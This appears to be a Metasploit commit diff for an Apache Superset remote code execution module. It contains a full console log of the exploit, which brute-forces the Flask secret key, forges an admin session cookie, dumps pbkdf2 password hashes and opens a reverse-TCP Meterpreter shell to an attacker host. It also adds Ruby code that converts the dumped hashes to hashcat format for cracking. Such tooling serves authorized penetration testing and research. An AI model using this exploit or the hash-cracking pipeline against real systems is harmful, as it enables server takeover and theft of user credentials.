working hashes for apache superset rce

documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md

@@ -38,28 +38,36 @@ Login to the app, click 'list users' under 'Settings', then click '+'. Make a ne
 ### Apache Superset 2.0.0 on Docker
 
 ```
-msf6 > use exploit/linux/http/apache_superset_cookie_sig_rce 
+msf6 > use exploit/linux/http/apache_superset_cookie_sig_rce
 [*] Using configured payload python/meterpreter/reverse_tcp
 msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
-msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set username admin
-username => admin
-msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set password admin
-password => admin
-msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set lhost 192.168.154.74
-lhost => 192.168.154.74
+msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set lhost 2.2.2.2
+lhost => 2.2.2.2
 msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set verbose true
 verbose => true
+msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set username user
+username => user
+msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set password user
+password => user
 msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.154.74:4444 
+[*] Started reverse TCP handler on 2.2.2.2:4444 
 [*] Attempting login
-[*] 127.0.0.1:8088 - CSRF Token: IjRjNDFiNzM3MjUwOWMzZWJkY2YwNWM4N2JkOTRhZjJlY2YwOWI3NDUi.ZPoroQ.Jhv-EqwwbX7Un77JmCd-fPRO0jw
+[*] Grabbing CSRF token
+[*] 127.0.0.1:8088 - CSRF Token: ImFiOTFjYTQ2MjNjNzc1YjJlNmY2MThiYmFhZDk3OTI3NGUxYjVkNzci.ZQM-wQ.PuuU9Sr4i-3yGZq0UCnZBdk-qRA
 [*] 127.0.0.1:8088 - Attempting login
+[+] 127.0.0.1:8088 - Logged in Cookie: session=.eJwlj8GKAzEMQ_8l5znYSWwn_ZnBTmx22dLCTHsq_fem7E0gPSS90h6Hnz_p8jievqX9d6ZLCpLGnbQCM40YAlqWnL1EgADkVpuiNCWehYoBUZRgbDnjqIgrTR5hWHBRkV1DI1AnUJ6NwRUdwEDZhXvg8obCpGGEQbWnLY3ziP1x__Pb2qPWV6ByLkOELDt_y8xUZ5eepToaTZHFXe9Dr76YBW7pefrxfymn9wfKmEMC.ZQM-wQ.d_0zXIowRPUN8ax8NylYPOlAuyk;
+[*] 127.0.0.1:8088 - Checking secret key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
+[-] 127.0.0.1:8088 - Incorrect secret key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
+[*] 127.0.0.1:8088 - Checking secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+[+] 127.0.0.1:8088 - Found secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+[*] 127.0.0.1:8088 - Modified cookie: {"_fresh"=>true, "_id"=>"f578695a40665cfc70a3066d93ff07002848a178a56d353b055f3f618221c411a305effb13166df2eafaff1ad052d860ea1e00b0a6e769f1ff1ca0d5cb51f549", "csrf_token"=>"ab91ca4623c775b2e6f618bbaad979274e1b5d77", "locale"=>"en", "user_id"=>1}
+[*] 127.0.0.1:8088 - Attempting to resign with key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+[*] 127.0.0.1:8088 - New signed cookie: eyJfZnJlc2giOnRydWUsIl9pZCI6ImY1Nzg2OTVhNDA2NjVjZmM3MGEzMDY2ZDkzZmYwNzAwMjg0OGExNzhhNTZkMzUzYjA1NWYzZjYxODIyMWM0MTFhMzA1ZWZmYjEzMTY2ZGYyZWFmYWZmMWFkMDUyZDg2MGVhMWUwMGIwYTZlNzY5ZjFmZjFjYTBkNWNiNTFmNTQ5IiwiY3NyZl90b2tlbiI6ImFiOTFjYTQ2MjNjNzc1YjJlNmY2MThiYmFhZDk3OTI3NGUxYjVkNzciLCJsb2NhbGUiOiJlbiIsInVzZXJfaWQiOjF9.ZQM-wQ.lz1hKBJzLITRijnEdXS01xegiNE
+[+] 127.0.0.1:8088 - Cookie validated to user: admin
 [*] Attempting to pull user creds from db
-[*] Grabbing CSRF token
-[+] CSRF Token: IjRjNDFiNzM3MjUwOWMzZWJkY2YwNWM4N2JkOTRhZjJlY2YwOWI3NDUi.ZPoroQ.Jhv-EqwwbX7Un77JmCd-fPRO0jw
-[+] Successfully created db mapping with id: 1
+[+] Successfully created db mapping with id: 2
 [*] Creating new sqllab tab
 [+] Using tab: 1
 [*] Setting latest query id
@@ -69,27 +77,28 @@ msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > exploit
 
   Username  Password
   --------  --------
-  admin     pbkdf2:sha256:260000$GDv10qGetjVq8CIX$735ed1e400e2e2ebbdfd294f60f2e2800177874bc2455761cd799e14f7df6cd2
+  admin     $pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU
+  user      $pbkdf2-sha256$260000$azRXcXpkNVVOUjhtREkzUQ$0x2u615mTZUc1RTbFS07s8Io3IMSH4DAfzteN6YOctk
 
 [*] Attempting RCE
 [*] Creating new dashboard
 [+] New Dashboard id: 1
 [*] Grabbing permalink to new dashboard to trigger payload later
-[+] Dashboard permalink key: eybwJ7EVjR3
+[+] Dashboard permalink key: KaJynrmk94N
 [*] Setting latest query id
 [*] Uploading payload
 [*] Triggering payload
 [*] Sending stage (24768 bytes) to 172.17.0.2
-[*] Meterpreter session 1 opened (192.168.154.74:4444 -> 172.17.0.2:53892) at 2023-09-07 15:59:31 -0400
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 172.17.0.2:55878) at 2023-09-14 13:11:31 -0400
 [*] Deleting dashboard
 [*] Deleting sqllab tab
 [*] Deleting database mapping
 
 meterpreter > getuid
 Server username: superset
 meterpreter > sysinfo
-Computer        : 1e681df9b6fe
-OS              : Linux 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29)
+Computer        : f253114ca039
+OS              : Linux 6.4.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.4.11-1kali1 (2023-08-21)
 Architecture    : x64
 System Language : C
 Meterpreter     : python/linux

lib/metasploit/framework/hashes.rb

@@ -124,6 +124,8 @@ def self.identify_hash(hash)
         when hash =~ /^\*?[\da-fA-F]{32}\*[\da-fA-F]{32}$/
           # we accept the beginning star as optional
           return 'vnc'
+        when hash =~ /^\$pbkdf2-sha256\$[0-9]+\$[a-z0-9\/.]+\$[a-z0-9\/.]{43}$/i
+          return 'pbkdf2-sha256'
         end
         ''
       end

lib/metasploit/framework/password_crackers/cracker.rb

@@ -217,6 +217,8 @@ def jtr_format_to_hashcat_format(format)
             '1711'
           when 'Raw-MD5u'
             '30'
+          when 'pbkdf2-sha256'
+            '10900'
           end
         end
 

lib/metasploit/framework/password_crackers/hashcat/formatter.rb

@@ -1,10 +1,34 @@
+# This method takes a string which is likely base64 encoded
+# however, there is an arbitrary amount of = missing from the end
+# so we attempt to add = until we are able to decode it
+
+# @param str [String] the base64-ish string
+# @return [String] the corrected string
+
+def add_equals_to_base64(str)
+  ['', '=', '=='].each do |equals|
+    begin
+      to_test = "#{str}#{equals}"
+      Base64.strict_decode64(to_test)
+      return to_test
+    rescue ArgumentError
+      nil
+    end
+  end
+  nil
+end
+
+
+
+
 # This method takes a {framework.db.cred}, and normalizes it
 # to the string format hashcat is expecting.
 # https://hashcat.net/wiki/doku.php?id=example_hashes
 #
 # @param cred [credClass] A credential from framework.db
 # @return [String] The hash in jtr format or nil on no match.
 def hash_to_hashcat(cred)
+  puts cred.private.jtr_format
   case cred.private.type
   when 'Metasploit::Credential::NTLMHash'
     both = cred.private.data.split(':')
@@ -38,6 +62,16 @@ def hash_to_hashcat(cred)
       #         legacy MD5
       # T: = 160 characters
       #         PBKDF2-based SHA512 hash specific to 12C (12.1.0.2+)
+    when /^pbkdf2-sha256/
+      # hashmode: 10900
+      # from: $pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU
+      # to:   sha256:29000:Q1hzYjU5dFNMWm05QUJCTg==:s+vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU=
+
+      # https://hashcat.net/forum/thread-7854-post-42417.html#pid42417 ironically gives Token encoding exception
+      c = cred.private.data.sub('$pbkdf2-sha256', 'sha256').split('$')
+      c[2] = add_equals_to_base64(c[2].gsub('.', '+')) # pad back out
+      c[3] = add_equals_to_base64(c[3].gsub('.', '+')) # pad back out
+      return c.join(':')
     when /hmac-md5/
       data = cred.private.data.split('#')
       password = Rex::Text.encode_base64("#{cred.public.username} #{data[1]}")
@@ -101,6 +135,8 @@ def hash_to_hashcat(cred)
     when /^krb5$/
       return cred.private.data.to_s
     end
+
+
   end
   nil
 end

modules/auxiliary/analyze/crack_webapps.rb

@@ -16,6 +16,7 @@ def initialize
         Atlassian uses PBKDF2-HMAC-SHA1 which is 12001 in hashcat.
         PHPass uses phpass which is 400 in hashcat.
         Mediawiki is MD5 based and is 3711 in hashcat.
+        Apache Superset, some Flask and Werkzeug apps is pbkdf2-sha256 and is 10900 in hashcat
       },
       'Author'          =>
         [
@@ -35,6 +36,7 @@ def initialize
         OptBool.new('ATLASSIAN',[false, 'Include Atlassian hashes', true]),
         OptBool.new('MEDIAWIKI',[false, 'Include MediaWiki hashes', true]),
         OptBool.new('PHPASS',[false, 'Include Wordpress/PHPass, Joomla, phpBB3 hashes', true]),
+        OptBool.new('PBKDF2',[false, 'Apache Superset, some Flask and Werkzeug apps hashes', true]),
         OptBool.new('INCREMENTAL',[false, 'Run in incremental mode', true]),
         OptBool.new('WORDLIST',[false, 'Run in wordlist mode', true])
       ]
@@ -113,6 +115,7 @@ def check_results(passwords, results, hash_type, hashes, method)
     hashes_regex = []
     hashes_regex << 'PBKDF2-HMAC-SHA1' if datastore['ATLASSIAN']
     hashes_regex << 'phpass' if datastore['PHPASS']
+    hashes_regex << 'pbkdf2-sha256' if datastore['PBKDF2']
     hashes_regex << 'mediawiki' if datastore['MEDIAWIKI']
 
     # array of arrays for cracked passwords.

modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.rb

@@ -36,7 +36,8 @@ def initialize(info = {})
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [],
-          'SideEffects' => [IOC_IN_LOGS]
+          'SideEffects' => [IOC_IN_LOGS],
+          'RelatedModules' => ['exploit/linux/http/apache_superset_cookie_sig_rce']
         },
         'DisclosureDate' => '2023-04-25'
       )